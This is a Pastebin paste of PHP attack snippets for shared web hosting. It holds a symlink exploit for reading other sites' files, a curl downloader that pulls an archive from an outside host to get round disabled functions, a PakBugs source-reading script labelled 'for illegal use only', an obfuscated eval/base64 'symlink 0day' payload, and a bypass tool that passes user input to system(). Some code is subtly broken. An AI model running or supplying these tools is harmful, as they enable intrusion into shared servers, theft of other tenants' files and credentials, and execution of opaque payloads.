lehieuit

all

Apr 21st, 2012
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.08 KB | None | 0 0
  1. ======================Symlink (PHP) Exploit==================================
  2. $filepath='/home/xx/public_html/xx.xx';
  3. $sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';
  4. $flib=$sitepath.$wr iteblefilepath; @unlink($flib);
  5. symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
  6. @unlink($flib);
  7.  
  8. ====================Eval code disable function wget bypass=============================
  9.  
  10. $curl = curl_init("http://www.dosyasitesi.com/safemodefuck.tar.gz");
  11. curl_setopt($curl, CURLOPT_HEADER, false);
  12. curl_setopt($curl, CURLOPT_VERBOSE, false);
  13. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  14. $output = curl_exec($curl);
  15. curl_close($curl);
  16. $dosya = fopen("safemodefuck.tar.gz", "a+");
  17. fwrite($dosya, $output);
  18. fclose($dosya);
  19.  
  20. =============Reading PHP files source code Without Using Commands====================
  21.  
  22. <?php
  23. /*------------------------------------------------------------------------------------------------------------*\
  24. # This Script for Reading PHP files source code Without Using Commands
  25. # Work on Execpt cPanel Servers
  26. # Created by ZombiE_KsA
  27. # sh0tz : spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh
  28. # n00bz : sec-r1z.com, (r1z), Red-D3v1L and all script kiddies
  29. # Copyright 2001 - 2010 PAKbugs All Rights Reserved
  30. # Pakbugs.com
  31. \*--------------------------------------------------------------------------------- ---------------------------*/
  32. #FUCK THE C0DE!
  33.  
  34. #?>
  35. <style type="text/css">
  36. <!--
  37. body,td,th {
  38. color: #093;
  39. }
  40. body {
  41. background-color: #000;
  42. }
  43. -->
  44. </style>
  45. <?
  46. $sub1 = "<PRE><P>This Script for Reading PHP files source code Without Using Commands <a href=\"http://pakbugs.com\">http://pakbugs.com</a> <p>Script for illegal use only.<p>Worked Except whm/cPanel servers<p>More: <a href=\"http://pakbugs.com\">http://pakbugs.com</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"> </form>\n";
  47. echo htmlspecialchars_decode($sub1, ENT_NOQUOTES);
  48.  
  49. #
  50.  
  51. #
  52.  
  53. #
  54. if(!is_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
  55. #
  56. if(!is_writable(dirname(__FILE__))) die("<b>I can't create http:directory</b>");
  57. #
  58. mkdir("http:");
  59. #
  60. }
  61. #
  62.  
  63. #
  64. if(empty($file) and empty($_GET['file']) and empty($_POST['file']))
  65. #
  66. die("\n".$karatonik);#
  67. if(!empty($_GET['file'])) $file=$_GET['file'];
  68. #
  69. if(!empty($_POST['file'])) $file=$_POST['file'];
  70. #
  71.  
  72. #
  73.  
  74. #
  75. if((curl_exec(curl_init("file:http://../".htmlspecialchars_decode($file)))) and !empty($file)) die("<B><br>pakbugs.com str1k3</B><p>Sh0tz: spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh <p>Script Kiddies/n00bz: sec-r1z.com, (r1z), Red-D3v1L, SAS-terr0rist <p></FONT>");
  76. #
  77. elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");
  78.  
  79. #
  80. ?>
  81.  
  82. ===================priv8 symlink() 0day coded by NazZ================================
  83.  
  84. <?php
  85. // Symlink ByPass Tool
  86. // NaZZ
  87. // Credits to IT-Sec
  88. eval(gzinflate(str_rot13(base64_decode('Dc7HzptXAEDhx8l/xcIU0xRygYGhGNMxchPRwaYNUH/6m7P/pEZhdvdGX+1DaOlF/qBy/juPC079cSkqmfvfoszHovz5JeWRiqAeCYLkXPSXPW/dH2iwmM6mePL9UdO3NU4CcU+lsUKBJ4vAMtQNooOc7XJmLmlcKrogVKyteYDcvG9PqDcRYptq8V0rcbk2tiAxxe5WLAcRcdkb/22Ys5/HLn5eRxnxQVVN4XhSg0nw1JbZCwW9DxtR/9irfx5sHfrkOXfcViagjvOuiafWfGczt8jEUwXsIqVD7mSOjD2HLSWvSPNSRp021PjR+RBo/GLQBS9HXGpOG91dP9Fhx4bPdMG+6K7bZUqIdGvcliPx/c4AtrjW9tYmvb4NueJ4JS692mVFoCkNGyVqLmYvkc/3RLoTjzGutP6jXN46GtyHas/AR70CMrZAO3IaLmTF52wI6vOTCMbKW2RlG+QBk58z2w20I+hp1AH7U64B+rbt4qDXDqC9GpkIC6MABsbMJq5HyqZFdj86lv0yJuWM3o+vXXQvePRM0UMPPsxmE+Pzgd6Nwjp7kjCCxwGTkR7wRMauXDnDaJNwFxLiXgQtQ+O5ATpyDoEl1l0yTDTemM6zPfNmcGmDAevAF6znx84Z3NzRo1Ui/0daTIsizSZqB9cvQQQsyffFbuZ2Bx9YX1GG/W/AAd/egfW1o0Er8Pw3PbGSk4xC8sqhSqvKREyEh9Ajv8+E7xRgVbW58y5UotFZzC3SstvE4fR5Dp9r3SVywM9kI942jZXFa+zbjWK8b1ZsnNK062babHk+n85LiUe7+djVcChMK76C78xQMuOacpL66tuAAVJf+CSUZoRohk3qjO2cpBuyViynY3PmYygPDUkrkrmBTCZAkHKbAR7R+7lIYsYMztlEyym3fIWtvsXxikeiRsHeGyV87CCdlhB+2uTQTaaX4E3QpgbHdTYMmnVzZJjNyPI81Ra4DUWZa7el7NFUO21Yg2n/KmFGInDmPErtt1ZjI2+5SBuF0eztJjh//vz671+//wc='))));
  89. ?>
  90.  
  91. ----------------------------------------
  92.  
  93. <?php
  94. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  95. echo '<script>alert("This function does not work on Windows platforms.")</script>';exit;
  96. }else{
  97. $slash="/";
  98. $basep=str_replace("\\","/",$basep);
  99. }
  100. $s=$_SERVER['PHP_SELF'];
  101. echo '<style type="text/css">
  102. body {
  103. background-color:#000000; color:#ffffff; font-family: Agency FB; font-size: 20px; text-align:center;
  104. }
  105. p.head {
  106. font-family: Agency FB; font-size: 40px;
  107. }
  108. p.text {
  109. font-family: Agency FB; font-size: 15px;
  110. }
  111. </style>';
  112. echo '<p class="head"><big>Symlink Bypass Tool</big></p>';
  113. echo '<form method=post action="'.$s.'">
  114. <p align="center">
  115. SymLink With PHP<br><input name=ad1syp size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=Submit><p align="center"></form>
  116. <form method=post action="'.$s.'"><p align="center">
  117.  
  118. SymLink With OS : <br><input name=ad1syc size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=Submit>
  119.  
  120. </p></form><br><p class="text">© Coded By NaZZ</p>';
  121. if ($_POST['ad1syp'] && $_POST['ad2syp']){
  122. if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
  123. echo "<script>alert('Symlink Worked')</script>";
  124. }else{
  125. echo "<script>alert('Symlink Not Worked')</script>";
  126. }}
  127. if ($_POST['ad1syc'] && $_POST['ad2syc']){
  128. if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
  129. echo "<script>alert('Symlink Worked')</script>";
  130. }else{echo "<script>alert('Symlink Not Worked')</script>";
  131. }}
  132. ?>
Add Comment
Please, Sign In to add comment